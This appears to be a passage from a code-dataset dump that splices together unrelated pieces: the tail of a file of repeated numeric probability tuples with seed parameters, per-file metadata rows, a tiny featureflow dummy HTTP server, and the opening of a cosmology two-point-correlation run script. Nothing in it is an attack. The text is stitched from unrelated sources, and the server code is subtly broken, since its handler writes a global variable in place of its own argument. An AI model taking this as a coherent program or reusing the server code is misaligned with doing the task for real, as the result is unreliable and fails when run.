(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 123
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 124
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 125
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 126
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 127
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 128
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 129
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 130
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 131
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 132
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 133
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 134
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 135
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 136
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 137
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 138
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 139
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 140
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 141
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 142
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 143
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 144
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 145
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 146
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 147
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 148
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 149
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 150
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 151
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 152
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 153
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 154
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 155
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 156
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 157
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 158
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 159
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 160
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 161
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 162
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 163
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 164
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 165
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 166
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 167
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 168
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 169
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 170
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 171
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 172
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 173
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 174
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 175
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 176
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 177
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 178
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 179
)
"""
parameters for reproducibiliy. More information: https://numpy.org/doc/stable/reference/random/parallel.html
"""
#initial entropy
entropy = 8991598675325360468762009371570610170
#index for seed sequence child
child_seed_index = (
1, # 0
16, # 1
)
| 276.481283 | 500 | 0.769742 |
0e3a66238933f9c5b54dd7fdb1c41b196943196e | 634 | py | Python | featureflow/dummyserver.py | jayvdb/featureflow | 7731487b00e38fa4f58c88b7881870fda2d69fdb | [
"MIT"
] | 7 | 2017-06-10T13:26:04.000Z | 2021-04-01T07:46:53.000Z | featureflow/dummyserver.py | jayvdb/featureflow | 7731487b00e38fa4f58c88b7881870fda2d69fdb | [
"MIT"
] | 9 | 2016-08-05T01:51:36.000Z | 2020-06-01T13:32:34.000Z | featureflow/dummyserver.py | jayvdb/featureflow | 7731487b00e38fa4f58c88b7881870fda2d69fdb | [
"MIT"
] | 5 | 2016-09-09T03:19:35.000Z | 2021-11-28T01:28:56.000Z | import http.server
import sys
def handler_class(static_content):
class DummyHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Length', len(static_content))
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write(content.encode())
return DummyHandler
if __name__ == '__main__':
port = int(sys.argv[1])
content = sys.argv[2]
server = http.server.HTTPServer(
('localhost', port),
handler_class(content))
server.serve_forever()
| 27.565217 | 67 | 0.635647 |
57dba6a08bf6ad19d9a6c2a3a5a4cea8ec11f9eb | 10,379 | py | Python | struct/measurement/nbody/2pcf/RUN_test.py | naonori/hitomi | 02b188eb8ada4d39a10801bf3193581b9bc9c310 | [
"MIT"
] | 6 | 2021-09-28T04:00:56.000Z | 2022-03-23T03:49:19.000Z | struct/measurement/nbody/2pcf/RUN_test.py | naonori/hitomi | 02b188eb8ada4d39a10801bf3193581b9bc9c310 | [
"MIT"
] | null | null | null | struct/measurement/nbody/2pcf/RUN_test.py | naonori/hitomi | 02b188eb8ada4d39a10801bf3193581b9bc9c310 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import subprocess
try:
os.mkdir("LOG")
except:
print("")
try:
os.mkdir("PARAMS")
except:
print("")
realization = 1
measure = "2PCF"
boxsize_x = 1000.0
boxsize_y = 1000.0
boxsize_z = 1000.0
n_mesh_x = 512
n_mesh_y = 512
n_mesh_z = 512
n_kbin = 20
kmin = 0.01
kmax = 0.20
n_rbin = 25
rmin = 30.0
rmax = 150.0
flag_recon = "False" # "True" or "False"
b1_fid = 2.0
RG = 15.0
ith_kbin = 0
ith_rbin = 0
# b1_fid_dict = {}
# b1_fid_dict.update({"zbin0_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin0_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin0_Mmin13.5_Mmax14.0": })
# b1_fid_dict.update({"zbin1_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin1_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin1_Mmin13.5_Mmax14.0": })
